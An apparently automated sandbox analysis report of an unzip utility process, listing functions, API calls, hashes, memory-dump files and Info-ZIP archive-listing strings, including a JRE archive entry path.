jre/jre-1.8/lib/deploy/email.js, xrefs: 00418052

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: File$AttributesCloseCreateErrorHandleLastTimesprintf
String ID: jre/jre-1.8/lib/deploy/email.js
API String ID: 4060495600-686973149
Opcode ID: a5f5633623b62a2bd79a4cbceeb37486298e21d19d5df79cb26c37824754c8d1
Instruction ID: 372bcf8624f903ca52df3f1e33ae428ee19a75c0c9918fa4b1be5190981bc173
Opcode Fuzzy Hash: a5f5633623b62a2bd79a4cbceeb37486298e21d19d5df79cb26c37824754c8d1
Instruction Fuzzy Hash: A12160756097018BD304EF25D18135FBBE0BFC4358F05891EE8D557392DB789A498B8B

Function 0041AB20 Relevance: 6.0, APIs: 4, Instructions: 42fileCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 0041AB4A
SetFilePointer.KERNEL32(?,?,?,?,?,?,?,?,00409FC2), ref: 0041AB6C
SetEndOfFile.KERNEL32 ref: 0041AB7F
SetFilePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00409FC2), ref: 0041ABAB

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: File$Pointer$_get_osfhandle
String ID:
API String ID: 3045976294-0
Opcode ID: 79325a91394aa0e9c38547cc8ce520f5e19aca59e6347456edf24add412f31c9
Instruction ID: 11f3199f914d0ba6a51cfcc92d79c2df6d761792a5edeaca3884f5f6a2149d2a
Opcode Fuzzy Hash: 79325a91394aa0e9c38547cc8ce520f5e19aca59e6347456edf24add412f31c9
Instruction Fuzzy Hash: 230129B06083419BD300FF39C58136BBAE1AF84354F50CA1DE8A54B386D63DD9598B97

Function 0041AB3C Relevance: 6.0, APIs: 4, Instructions: 37fileCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 0041AB4A
SetFilePointer.KERNEL32(?,?,?,?,?,?,?,?,00409FC2), ref: 0041AB6C
SetEndOfFile.KERNEL32 ref: 0041AB7F
SetFilePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00409FC2), ref: 0041ABAB

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: File$Pointer$_get_osfhandle
String ID:
API String ID: 3045976294-0
Opcode ID: eba752e7fa7d014bce0b39700a7dc6cefde161ed7311621856cf4327b2b0e227
Instruction ID: 8ccdba47657051207becc2b63cc9d4ee1adcc3e9cde0171563bc25bdd447206a
Opcode Fuzzy Hash: eba752e7fa7d014bce0b39700a7dc6cefde161ed7311621856cf4327b2b0e227
Instruction Fuzzy Hash: A1011AB46087009BD300EF29C18536BBAE1BF84354F51CA1DE8E947386D339E959CB92

Function 0041DEF0 Relevance: 4.5, APIs: 3, Instructions: 31COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0041A39A), ref: 0041DF12
_errno.MSVCRT ref: 0041DF3D
_errno.MSVCRT ref: 0041DF55

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _errno$CreateDirectory
String ID:
API String ID: 1407205365-0
Opcode ID: 768813744d92f8a2579a04e715d7e490fed02e319f2ecebc85ee76e429316dc7
Instruction ID: 34c5d321a4891936da9f64b047f8bba565c07f25574fc30572c746df60e64594
Opcode Fuzzy Hash: 768813744d92f8a2579a04e715d7e490fed02e319f2ecebc85ee76e429316dc7
Instruction Fuzzy Hash: E2F031B09083118BC710EF19D58111BBBE4BF48754F850A9EF88867342D3389E45CBAB

Function 0040B118 Relevance: 3.1, APIs: 2, Instructions: 119timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32 ref: 0040B200
localtime.MSVCRT ref: 0040B25F

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: InformationTimeZonelocaltime
String ID:
API String ID: 2130894942-0
Opcode ID: dcfa0507197a02b881a1ad3f70d06d61f9054f75a0018f0b598830e3f85ed3f2
Instruction ID: 9aa76404f295a8bd7a6e3e19d66d829a1054deef807f49adba2a730dc62723ec
Opcode Fuzzy Hash: dcfa0507197a02b881a1ad3f70d06d61f9054f75a0018f0b598830e3f85ed3f2
Instruction Fuzzy Hash: A741D6325047468FC724DE18C8446ABB7A1FBC4350F44867ED9655B2C5E734AA05CBC5

Function 0041AE50 Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 0041AE6A
GetConsoleScreenBufferInfo.KERNEL32 ref: 0041AE7D

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: BufferConsoleHandleInfoScreen
String ID:
API String ID: 3205511803-0
Opcode ID: aaf7ccd7af20df90f5411d6316dbb50fe5b78ff0b87b495c17dea9fd491214b8
Instruction ID: ad6997ba3b7f2c0d298ee9a33277f67eb5c7d3a9c5877c0522328a43734619cb
Opcode Fuzzy Hash: aaf7ccd7af20df90f5411d6316dbb50fe5b78ff0b87b495c17dea9fd491214b8
Instruction Fuzzy Hash: 49F0F6B59097518AC704EF2881C012FBBF4BB89B01F81092EE9D583211D3349898CB47

Function 0040B2DC Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

localtime.MSVCRT ref: 0040B25F

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: localtime
String ID:
API String ID: 1047626651-0
Opcode ID: 2d0ca51d55e20f3cbf1cf1624a91313b8baafa05c8e996c1bfcea98515b8a624
Instruction ID: cc8d8e1ae135c2627ecf5562b592b281164e2f3bf6f72be6111e421aab844661
Opcode Fuzzy Hash: 2d0ca51d55e20f3cbf1cf1624a91313b8baafa05c8e996c1bfcea98515b8a624
Instruction Fuzzy Hash: 4FF0C276604B168FD3249E6594042AFB390FB80334F10877EEAB4672D0E734E906CBCA

Function 00401000 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 0040100D

Part of subcall function 00401079: SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,00401018), ref: 0040108E
Part of subcall function 00401079: __getmainargs.MSVCRT ref: 004010C9
Part of subcall function 00401079: _setmode.MSVCRT ref: 004010F0
Part of subcall function 00401079: _setmode.MSVCRT ref: 00401110
Part of subcall function 00401079: _setmode.MSVCRT ref: 00401130
Part of subcall function 00401079: __p__fmode.MSVCRT ref: 00401135
Part of subcall function 00401079: __p__environ.MSVCRT ref: 00401147
Part of subcall function 00401079: _cexit.MSVCRT ref: 0040116C
Part of subcall function 00401079: ExitProcess.KERNEL32 ref: 00401174

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode__set_app_type_cexit
String ID:
API String ID: 250851222-0
Opcode ID: dfd319aaaca191f59429af3e1b78efefb89968859a14ac78092e00cc0592f741
Instruction ID: 5bc938aa08b70dc5eda3d104b4e7de3d2648877fefcbc8eb88bd8ebed737b19c
Opcode Fuzzy Hash: dfd319aaaca191f59429af3e1b78efefb89968859a14ac78092e00cc0592f741
Instruction Fuzzy Hash: 99B092700082045BC3003B65990A2187AA85B00306F401038E8C0111A6DAB8149846AB

Non-executed Functions

Function 00414D50 Relevance: 324.2, APIs: 55, Strings: 160, Instructions: 1698COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 00414E60
sprintf.MSVCRT ref: 00414EB4
sprintf.MSVCRT ref: 00414EFF
sprintf.MSVCRT ref: 00414F53
sprintf.MSVCRT ref: 00414F9E
sprintf.MSVCRT ref: 00414FE7
sprintf.MSVCRT ref: 00415047
sprintf.MSVCRT ref: 00415092
sprintf.MSVCRT ref: 004150F1
sprintf.MSVCRT ref: 0041513E
sprintf.MSVCRT ref: 0041517D
sprintf.MSVCRT ref: 004151BC
sprintf.MSVCRT ref: 004151FC
sprintf.MSVCRT ref: 0041523C
sprintf.MSVCRT ref: 0041527C
sprintf.MSVCRT ref: 004152BD
sprintf.MSVCRT ref: 00415323
sprintf.MSVCRT ref: 00415507
sprintf.MSVCRT ref: 00415606
sprintf.MSVCRT ref: 00415674
sprintf.MSVCRT ref: 00415739
sprintf.MSVCRT ref: 0041577D
sprintf.MSVCRT ref: 0041580F
sprintf.MSVCRT ref: 00415886
sprintf.MSVCRT ref: 0041597F
sprintf.MSVCRT ref: 00415A19
sprintf.MSVCRT ref: 00416D9C

Strings

yes, xrefs: 0041507A
old Info-ZIP Unix/OS2/NT, xrefs: 004157E8, 0041585F, 00416562
dZip, xrefs: 00415F4E
VALL, xrefs: 00416056
PKWARE VMS, xrefs: 004163FE
unknown, xrefs: 00415958
Tandem NSK, xrefs: 0041647B
Theos, xrefs: 00416532
size of sliding dictionary (implosion): %cK, xrefs: 00416C8C
apparent file type: %s, xrefs: 00415314
non-MSDOS external file attributes: %06lX hex, xrefs: 00416730
PKWARE Win32, xrefs: 0041640E
There is no file comment., xrefs: 0041572A
VDAT, xrefs: 00416070
(, xrefs: 00416A85
??? , xrefs: 00416791
GMT modification/access times only, xrefs: 004157D8, 0041584D
lab , xrefs: 004155A1
may be, xrefs: 004157F8
Directory , xrefs: 00416785
FAB, xrefs: 00416008
old Info-ZIP Macintosh, xrefs: 0041591E
number of Shannon-Fano trees (implosion): %c, xrefs: 00416CD8
unknown, xrefs: 0041600F
exe, xrefs: 00415547
error: EF data block (type 0x%04x) size %u exceeds remaining extra field space %u; block length has been truncated., xrefs: 004165E4
The central-directory extra field contains:, xrefs: 00415665
VRDT, xrefs: 00416062
file last modified on (DOS date/time): %s, xrefs: 004150D7
version, xrefs: 00416098
text, xrefs: 004152EA
length of extra field: %u bytes, xrefs: 00415229
D, xrefs: 00416A6D
minimum software version required to extract: %u.%u, xrefs: 00414F79
ASi Unix, xrefs: 00416598
modification, xrefs: 0041624D
PKWARE Unix, xrefs: 0041641B
R, xrefs: 00416A55
UTC, xrefs: 00416BE1
Unix file attributes (%06o octal): %s, xrefs: 004154EF
UX, xrefs: 00415867
universal time, xrefs: 004164A6
Resource-fork, xrefs: 00415CA1, 00415D6F
ZPIT, xrefs: 00415ED8
GMT modification/access times and Unix UID/GID, xrefs: 00415846
VFAB, xrefs: 00416003
W, xrefs: 00416A65
hid , xrefs: 004155CD
OS/2, xrefs: 00415934
uncompressed size: %lu bytes, xrefs: 004151A3
D, xrefs: 004169FD
Fred Kantor MD5, xrefs: 004164E3
MS-DOS file attributes (%02X hex): %s%s%s%s%s%s%s%s, xrefs: 004155F7
. File is marked as %s, xrefs: 00415C67
VM/CMS, xrefs: 00415905
not , xrefs: 00416C31
creation, xrefs: 004161F6
-------------------------- file comment ends -----------------------------, xrefs: 004157CB
XABPRO, xrefs: 004160EA
. The first 20 are: , xrefs: 00415AED
Keyed , xrefs: 00416757
D, xrefs: 00416A35
new Info-ZIP Macintosh, xrefs: 0041642E
. The file was originally a Tandem %s file, with file code %u, xrefs: 00415E99
W, xrefs: 00416A2D
- A subfield with ID 0x%04x (%s) and %u data bytes, xrefs: 0041596C
VMSV, xrefs: 0041607C
ZipIt Macintosh, xrefs: 00416447
. The AOS/VS extra field revision is %d.%d, xrefs: 0041638A
Unix UID/GID, xrefs: 004165BF
Sequential , xrefs: 00416868
R, xrefs: 00416A1D
length of file comment: %u characters, xrefs: 00415269
compression sub-type (deflation): %s, xrefs: 00416C42
minimum file system compatibility required: %s, xrefs: 00414F44
VKEY, xrefs: 00416083
SMS/QDOS, xrefs: 004165A8
. The local extra field has %lu bytes of NT security descriptor data, xrefs: 00415E08
86 program , xrefs: 00416887
file system or operating system of origin: %s, xrefs: 00414EA5
E, xrefs: 00416A7D
MS-DOS file attributes (%02X hex): read-only, xrefs: 00416632
XABKEY, xrefs: 00416088
XABFHC, xrefs: 00415FF5
version of encoding software: %u.%u, xrefs: 00414EDA
32-bit CRC value (hex): %.8lx, xrefs: 00415125
R, xrefs: 004169E7
Theos file attributes (%04X hex): %s, xrefs: 00416856
E, xrefs: 00416A0D
compression method: %s, xrefs: 00414FD8
BeOS, xrefs: 0041654D
VFHC, xrefs: 00415FF0
ebcdic, xrefs: 004152F5
Info-ZIP VMS, xrefs: 0041650C
%02x, xrefs: 00415AAA
Amiga file attributes (%06o octal): %s, xrefs: 00416999
binary, xrefs: 004152FC
. File is marked as %s, File Dates are in %d Bit, xrefs: 00415D78
Security Descriptor, xrefs: 0041648B
PKWARE AV, xrefs: 0041594E
. The extra field is %s and has %u bytes of VMS %s information%s, xrefs: 0041603D
access, xrefs: 00416183
W, xrefs: 004169F5
XABALL, xrefs: 0041605B
286 program , xrefs: 004168AD
. The local extra field has %lu bytes of access control list information, xrefs: 00415B43
offset of local header from start of archive: %lu (%.8lXh) bytes, xrefs: 00414E43
386 program , xrefs: 004168B8
lnk , xrefs: 0041555F
VPRO, xrefs: 00415FDE
disk number on which file begins: disk %u, xrefs: 004152A9
Acorn SparkFS, xrefs: 00416468
: , xrefs: 00415A0A
unknown (%d), xrefs: 00416D06, 00416D2F, 00416D58
ZipIt Macintosh (short), xrefs: 00416452
local, xrefs: 00416B76
Library , xrefs: 00416773
%02x, xrefs: 004163CF
VPRO, xrefs: 00415FE9
SmartZip Macintosh, xrefs: 004164F9
MVS, xrefs: 004164D8
. The Mac long filename is %s, xrefs: 00415BE4, 00415F9B
PKWARE 64-bit sizes, xrefs: 00415947
), xrefs: 004160D1
XABDAT, xrefs: 00416075
OS/2 ACL, xrefs: 004164BF
. The local extra field has UTC/GMT %s time%s, xrefs: 00416240
extended local header: %s, xrefs: 00415083
. The QDOS extra field subtype is `%c%c%c%c', xrefs: 004162A6
JLEE, xrefs: 00415C42
E, xrefs: 00416A45
VMS file attributes (%06o octal): %s, xrefs: 00416AF8
AOS/VS, xrefs: 0041651C
MS-DOS file attributes (%02X hex): none, xrefs: 00416659
------------------------- file comment begins ----------------------------, xrefs: 0041576E
Indexed , xrefs: 00416899
. The local extra field has %lu bytes of %scompressed Macintosh finder attributes, xrefs: 00415D08
XABRDT, xrefs: 004160E0
@, xrefs: 00415F3A
compressed size: %lu bytes, xrefs: 00415164
VFHC, xrefs: 00415FFC
. The local extra field has %lu bytes of OS/2 extended attributes. (May not match OS/2 "dir" amount due to storage method), xrefs: 00415B3C
There %s a local extra field with ID 0x%04x (%s) and %u data bytes (%s)., xrefs: 00415800, 00415877
arc , xrefs: 00415575
There are an extra %ld bytes preceding this file., xrefs: 00416D87
file security status: %sencrypted, xrefs: 00415038
length of filename: %u characters, xrefs: 004151E9
Direct , xrefs: 00416873
VRDT, xrefs: 00416069
dir , xrefs: 0041558B
file last modified on (UT extra field modtime): %s %s, xrefs: 00416B89, 00416BED
sys , xrefs: 004155B7
ZPIT, xrefs: 00415BB7
%, xrefs: 00414E31, 00414E79, 00414ECD, 00414F18, 00414F6C, 00414FB7, 00415000, 00415060, 004150AB, 0041510A, 00415157, 00415196, 004151D5, 00415215, 00415255, 00415295, 004152D6, 0041533C, 00415520, 0041561F, 0041568D, 004156BE, 00415752, 00415796, 00415828, 0041589F, 00415998, 00415A32, 00415A68, 00415AD6, 00415B1A, 00415B78, 00415C0C, 00415C8F, 00415D30, 00415DA0, 00415E30, 0041630D, 00416610, 00416BB1, 00416C15, 00416C7A, 00416CCB, 00416DB5
. The local extra field has %lu bytes of %scompressed BeOS file attributes, xrefs: 004162E5
(, xrefs: 004160B8
Data-fork, xrefs: 00415C5E, 00415D54
. The 128-bit MD5 signature is %s, xrefs: 004163EE
rdo , xrefs: 004155E3
, xrefs: 004160B3

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf
String ID: - A subfield with ID 0x%04x (%s) and %u data bytes$ The central-directory extra field contains:$ There %s a local extra field with ID 0x%04x (%s) and %u data bytes (%s).$ There is no file comment.$ error: EF data block (type 0x%04x) size %u exceeds remaining extra field space %u; block length has been truncated.$ offset of local header from start of archive: %lu (%.8lXh) bytes$------------------------- file comment begins ----------------------------$ $ 32-bit CRC value (hex): %.8lx$ Amiga file attributes (%06o octal): %s$ MS-DOS file attributes (%02X hex): %s%s%s%s%s%s%s%s$ MS-DOS file attributes (%02X hex): none$ MS-DOS file attributes (%02X hex): read-only$ Theos file attributes (%04X hex): %s$ There are an extra %ld bytes preceding this file.$ Unix file attributes (%06o octal): %s$ VMS file attributes (%06o octal): %s$ apparent file type: %s$ compressed size: %lu bytes$ compression method: %s$ compression sub-type (deflation): %s$ disk number on which file begins: disk %u$ extended local header: %s$ file last modified on (DOS date/time): %s$ file last modified on (UT extra field modtime): %s %s$ file security status: %sencrypted$ file system or operating system of origin: %s$ length of extra field: %u bytes$ length of file comment: %u characters$ length of filename: %u characters$ minimum file system compatibility required: %s$ minimum software version required to extract: %u.%u$ non-MSDOS external file attributes: %06lX hex$ number of Shannon-Fano trees (implosion): %c$ size of sliding dictionary (implosion): %cK$ uncompressed size: %lu bytes$ version of encoding software: %u.%u$ %02x$ 86 program $%$%02x$($($)$-------------------------- file comment ends -----------------------------$. File is marked as %s$. File is marked as %s, File Dates are in %d Bit$. The 128-bit MD5 signature is %s$. The AOS/VS extra field revision is %d.%d$. The Mac long filename is %s$. The QDOS extra field subtype is `%c%c%c%c'$. The file was originally a Tandem %s file, with file code %u$. The local extra field has %lu bytes of %scompressed BeOS file attributes$. The local extra field has %lu bytes of %scompressed Macintosh finder attributes$. The local extra field has %lu bytes of NT security descriptor data$. The local extra field has %lu bytes of OS/2 extended attributes. (May not match OS/2 "dir" amount due to storage method)$. The local extra field has %lu bytes of access control list information$. The local extra field has UTC/GMT %s time%s$. The extra field is %s and has %u bytes of VMS %s information%s$. The first 20 are: $286 program $386 program $: $??? $@$AOS/VS$ASi Unix$Acorn SparkFS$BeOS$D$D$D$Data-fork$Direct $Directory $E$E$E$FAB$Fred Kantor MD5$GMT modification/access times and Unix UID/GID$GMT modification/access times only$Indexed $Info-ZIP VMS$JLEE$Keyed $Library $MVS$OS/2$OS/2 ACL$PKWARE 64-bit sizes$PKWARE AV$PKWARE Unix$PKWARE VMS$PKWARE Win32$R$R$R$Resource-fork$SMS/QDOS$Security Descriptor$Sequential $SmartZip Macintosh$Tandem NSK$Theos$UTC$UX$Unix UID/GID$VALL$VDAT$VFAB$VFHC$VFHC$VKEY$VM/CMS$VMSV$VPRO$VPRO$VRDT$VRDT$W$W$W$XABALL$XABDAT$XABFHC$XABKEY$XABPRO$XABRDT$ZPIT$ZPIT$ZipIt Macintosh$ZipIt Macintosh (short)$access$arc $binary$creation$dZip$dir $ebcdic$exe$hid $lab $lnk $local$may be$modification$new Info-ZIP Macintosh$not $old Info-ZIP Macintosh$old Info-ZIP Unix/OS2/NT$rdo $sys $text$universal time$unknown$unknown$unknown (%d)$version$yes
API String ID: 590974362-47249521
Opcode ID: ee75ae53a7e4e1f3a9882f141cb872800cedc3b0c5e6508784f466b956d4fdf5
Instruction ID: 1bda8299671a185061eb45db1f9d71c95c64fea2dbd1d645baf546ee78efc17f
Opcode Fuzzy Hash: ee75ae53a7e4e1f3a9882f141cb872800cedc3b0c5e6508784f466b956d4fdf5
Instruction Fuzzy Hash: F1F235B0909750DAC7209F19D0843EFBBE0AB94344F95C82FE8D95B351D7BC88C59B9A

Function 0040DF40 Relevance: 54.9, APIs: 21, Strings: 10, Instructions: 646stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041ACD0: GetLocaleInfoA.KERNEL32 ref: 0041ACF2

Part of subcall function 0041AD30: GetLocaleInfoA.KERNEL32 ref: 0041AD52

sprintf.MSVCRT ref: 0040EA68

Part of subcall function 0040A230: memcpy.MSVCRT(?,?,?,073AE000,00000000,00410ECD,?,?,?,?,00410655), ref: 0040A275

strncmp.MSVCRT ref: 0040E018
strcpy.MSVCRT ref: 0040E1DF
sprintf.MSVCRT ref: 0040E235
sprintf.MSVCRT ref: 0040E2CE

Part of subcall function 0040EF50: strlen.MSVCRT ref: 0040EF70

sprintf.MSVCRT ref: 0040E3F5
sprintf.MSVCRT ref: 0040E411
strncmp.MSVCRT ref: 0040E6B1

Strings

gfff, xrefs: 0040E750
-, xrefs: 0040E997
gfff, xrefs: 0040E1A0
s have a total of, xrefs: 0040E873, 0040E8E5
`pB, xrefs: 0040E626
has, xrefs: 0040E864, 0040E8D6
%, xrefs: 0040E2E9, 0040E70E, 0040E7FD, 0040E842, 0040E8AC, 0040E91E, 0040E9DE, 0040EA13, 0040EA81
?, xrefs: 0040E4C4
jre/jre-1.8/lib/deploy/email.js, xrefs: 0040E5E4, 0040E633
\pB, xrefs: 0040E5D6

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf$InfoLocalestrncmp$memcpystrcpystrlen
String ID: has$%$-$?$\pB$`pB$gfff$gfff$jre/jre-1.8/lib/deploy/email.js$s have a total of
API String ID: 656614610-1427656042
Opcode ID: 27533e62951ab86bde329015ff2a8b83e067ff4969224ee96fdcf41d820658da
Instruction ID: b69d99e72356f80dca29843ca83cdb23f0370ce0c05395efd2556735a086ae88
Opcode Fuzzy Hash: 27533e62951ab86bde329015ff2a8b83e067ff4969224ee96fdcf41d820658da
Instruction Fuzzy Hash: C45226B0909751CBC3249F26D48422EBBE0FB94744F50CD2EE9986B391D7B89845CF9A

Function 0041CF00 Relevance: 42.6, APIs: 16, Strings: 8, Instructions: 626COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 0041D16A
sprintf.MSVCRT ref: 0041D18B

Strings

t Wi, xrefs: 0041D670
Microsoft Windows 3.1 with Win32s , xrefs: 0041D080, 0041D571
osof, xrefs: 0041D669
s 95, xrefs: 0041D67E
Microsoft Windows Server 2003 family, , xrefs: 0041D040, 0041D4DB
ndow, xrefs: 0041D677
Microsoft Windows Millennium Edition , xrefs: 0041D0C0, 0041D5CE
3.5, xrefs: 0041D55D

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf
String ID: 3.5$Microsoft Windows 3.1 with Win32s $Microsoft Windows Millennium Edition $Microsoft Windows Server 2003 family, $ndow$osof$s 95$t Wi
API String ID: 590974362-4191083778
Opcode ID: eb4aef4dc1874fa738497fddbce1c963e0d6f45a5f937d9a76279312e7f8582d
Instruction ID: 2b40d705311dd3d0ff7680a4700d3fd7baf6e24acd06a8cf0c2a5fd2b4bc0b5b
Opcode Fuzzy Hash: eb4aef4dc1874fa738497fddbce1c963e0d6f45a5f937d9a76279312e7f8582d
Instruction Fuzzy Hash: 3632F8F09093509ACB259F109A8529BBFA2BF42708F55848FD8451F3A6C37CD986CB5E

Function 004145B0 Relevance: 30.4, APIs: 13, Strings: 7, Instructions: 401stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 00414668
malloc.MSVCRT ref: 00414C79

Strings

`pB, xrefs: 004148D6, 00414A6B
%, xrefs: 004147FD, 00414A16, 00414A59, 00414AA0, 00414AEC, 00414B9F, 00414BE9, 00414C1E
Central directory entry #%lu:---------------------------, xrefs: 004147D5
jre/jre-1.8/lib/deploy/email.js, xrefs: 00414898, 004148E3
%lu file%s, %lu bytes uncompressed, %lu bytes compressed: %s%d.%d%%, xrefs: 00414B73
gfff, xrefs: 00414B2A
